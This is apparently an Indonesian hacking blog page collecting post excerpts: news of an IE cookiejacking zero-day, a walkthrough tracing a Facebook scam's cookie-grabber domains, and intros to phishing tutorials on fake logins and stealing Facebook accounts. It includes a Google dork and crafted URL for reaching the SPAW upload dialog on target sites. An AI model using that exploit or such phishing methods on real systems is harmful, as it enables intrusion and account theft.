Microsoft Meremehkan Cookiejacking Vulnerability pada IE

Microsoft sudah tidak mempertimbangkan kehadiran bug pada Internet Explorer yang memungkinkan terjadinya serangan hijacking, tapi para peneliti keamanannya berpikir lain dengan melihat pengalaman yang sudah-sudah mendukung pendapat mereka.

Minggu lalu pada Hack in the Box security conference di Amsterdam, peneliti keamanan dari Italia, Rosario Valotta men-demo-kan serangan yang memanfaatkan zero-day vulnerability pada semua versi Internet Explorer untuk pencurian session cookies.

Session cookies adalah file teks berukuran kecil yang digunakan oleh website untuk melacak authentication user/pengguna. Dengan memiliki akses terhadap session cookie, attacker dapat mengendalikan (memiliki akses) account korban.

Oleh Valotta, serangan ini diberi nama cookiejacking karena menggabungkan bug pada IE dengan teknik clickjacking.

Pada dasarnya, itu adalah serangan social engineering yang mengelabui korbannya untuk berinteraksi dengan elemen halaman yang dibuat khusus oleh attacker.

SPAW Upload Vulnerability

Dork:

inurl:spaw2/uploads/files/ 

Exploit:

http://website_target/..../spaw2/uploads/files 

Ubah menjadi:

http://website_target/..../spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2〈=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files 

Setelah itu akan keluar halaman upload, silahkan eksplorasi sendiri :)

Bug pada IE Memungkinkan Serangan Session Cookie Hijacking

Sebuah zero-day vulnerability mempengaruhi setiap versi Internet Explorer yang memungkinkan attacker mengeksekusi serangan seperti clickjacking dalam rangka untuk mencuri session cookies.

Serangan yang dijjuluki cookiejacking ini, diungkapkan oleh peneliti keamanan independen Rosario Valotta pada Hack in the Box 2011 security conference di Amsterdam.

Serangan tersebut tidak berjalan sendiri namun dikombinasikan dengan beberapa teknik-termasuk sedikit social engineering. Bagaimanapun juga, jika dilakuukan dengan benar-hal tersebut terbukti sangat efektif.

Bug pada IE tersebut-terdapat pada browser loading sebuah konten cookie yang jika file yang berkaitan ditampilkan sebagai src untuk iFrame.

Namun sejak penggunaan path cookie tergantung pada user Windows, attacker perlu menentukan nilainya. Valotta menjelaskan metode web yang berbasis vulnerability ini terhadap browser dapat menampilkan username korban.

Menelusuri Scam pada Facebook

Sebelumnya hal ini jarang sekali terjadi, tapi hari ini seseorang (sebut saja Bunga) mengirim sesuatu di wall Facebook saya:

"OMG! Its unbeliveable now you can get to know who views your facebook profile.. i can see my top profile visitors and i am so shocked that my EX is still creeping my profile every hour. click below" 

Tentu saja saya tau kalo itu scam karena formatnya, bahasa yang digunakan, dan kenyataan bahwa dia (orang yang mengirim) tidak punya EX (baca: mantan) - kaya saya. =)) Setelah itu saya langsung copy pesan dan link-nya, hapus, lalu log off dan mulai mencari "kebenaran". :)

Link tersebut membawa saya ke situs: Welcome to Facebook - Log In, Sign Up or Learn More

Disitu seperti kebanyakan scam, mereka menginginkan agar anda menyalin javascript kedalam browser anda (jangan pernah dilakukan), jadi saya pustuskan untuk melihatnya lebih dalam.

Dilihat dari source-nya, tampaknya source tersebut berasal dari file http://wantnights.info/high.js. Setelah melihat yang saya temukan, itu adalah sebuah cookie grabber sederhana yang akan merekam login anda. Kemudian dia akan mendapatkan daftar teman anda lalu membuat pesan yang sama pada wall mereka.

Kemudian akan mengirim anda ke http://careget.info/next.php?userid = "+ user_id +" & name = "+ user_name dimana nampaknya merupakan informasi log anda ke halaman sebelum anda di redirect ke situs scam tersebut.

Melihat source pada next.php yang ada di http://careget.info/next.php, dapat dilihat bahwa kemudian itu akan mengarah ke http://bazerem.info/lb.php

Inovasi Anak Bangsa Peduli Teknologi

Disebutkan bahwa Indonesia merupakan konsumen hardware tertinggi di dunia, hal itu tidak lagi mengejutkan bila melihat realita yang terjadi saat ini.

Sebagai contoh, tidak usah ke ibu kota, di Jogja saja hampir setiap bulan diadakan pameran teknologi dimana disitu terdapat produk-produk terbaru yang belum lama di-launching dan ada di pameran tersebut. Bagi sebagian orang, itu terkesan membanggakan, karena tidak perlu menunggu terlalu lama, produk itu sudah masuk di Indonesia. Saat produk baru masuk, masyarakat kita berbondong-bondong menggunakannya, mengganti produk "lama" yang sebelumya mereka gunakan. Begitulah selanjutnya-fenomena yang terjadi saat masyarakat disuguhi produk-produk baru, tentu saja produk ber-merk luar.

Contoh lagi, BlackBerry di kalangan remaja. Banyak anak SMP, SMA, kuliah yang menggunakan BlackBerry, it's ok, tapi ternyata, kebanyakan dari mereka hanya menggunakanya tidak lebih dari handphone GPRS biasa, hanya digunakan untuk sms, telepon, chating, Facebook-an dan hal-hal lainya yang sebenarnya bisa juga dilakukan oleh gadget lamanya. Sedangkan untuk optimalisasi fasilitas yang tersedia-tidak begitu menonjol, hanya sebagian kecil pengguna yang memanfaatkanya. Entah gengsi atau takut dibilang ketinggalan jaman atau mungkin biar dibilang anak G4UL, tapi itulah yang terjadi saat ini.

[Step By Step] Membuat Fake Login

Hi, apa kabar? Akhirnya, setelah vakum selama kurang lebih 3 minggu saya bisa nulis lagi disini. Kemarin-kemarin saya (sok) sibuk fokus ke UTS, mudah-mudahan hasilnya memuaskan. Amin :)

Jika anda pembaca setia blog ini tentunya anda sudah tahu tentang phishing yang saya tulis pada Hacking Facebook Account dan Hacking Facebook Account II yang didalamya terdapat beberapa contoh fake login untuk mencuri data yang diinputkan user. Nah, disini saya masih akan membahas tentang phishing menggunakan fake login, tapi tidak seperti sebelumnya: saya menyediakan fake login siap pakai, kali ini saya akan menunjukan bagaimana cara membuat fake login.

Membuat fake login tidak sesulit kelihatanya, bahkan sangat mudah. Tapi, menurut saya seni dalam fake login adalah bagaimana cara attacker membuat korban masuk dan tenggelam dalam perangkap yang sudah disediakan tanpa pernah curiga.

Baiklah, yang perlu anda siapkan adalah:

• Halaman fake login
• Script PHP
• File *.txt kosong

Hacking Facebook Account II

Ini merupakan kelanjutan dari artikel saya sebelumnya yang membahas tentang pencurian email dan password Facebook serta bagaimana cara kerjanya. Sebelumya telah kita kelompokan jenis-jenis serangan yang marak digunakan attacker untuk mendapatkan account facebook korban:

• Sniffing
• Phisihng
• Scam
• Keylogger
• Social engineering

Kemarin saya sudah membahas beberapa diantaranya seperti sniffing dan phishing, kali ini saya akan fokus membahas Scam.

Apa itu scam? Scam adalah informasi yang ada diinternet yang bersifat menipu.

Bagaimana scam digunakan dalam pencurian account facebook?

Saya gambarkan dengan contoh kisah Intan dengan Tarwad dibawah ini.

Hacking Facebook Account

Sebenarnya dari dulu saya kurang tertarik mengangkat topik ini karena:

• Umum: coba anda perhatikan saat mengunjungi forum, situs maupun blog kemungkinan besar disitu terdapat "Hacking Facebook"
• Kurang bermanfaat: apa gunannya mengambil account Facebook orang lain? teman? pacar? Toh semua tentang mereka bisa kita lihat lewat account kita, kecuali hal-hal yang bersifat pribadi. Hormatilah privasi orang lain.
• Ga keren: apa yang akan anda lakukan saat sudah mengambil alih facebook orang teman? mencuri chip poker? mengganti foto profilnya dengan gambar porno? update status menggunakan kata-kata kotor? FU@K THEM!

Mungkin cukup itu alasan saya. Tentunya sekarang anda bertanya "kenapa ditulis?". Selain sedang miskin ide, alasan saya menulis ini adalah untuk sharing agar anda tidak terjebak didalamnya, pencurian account Facebook.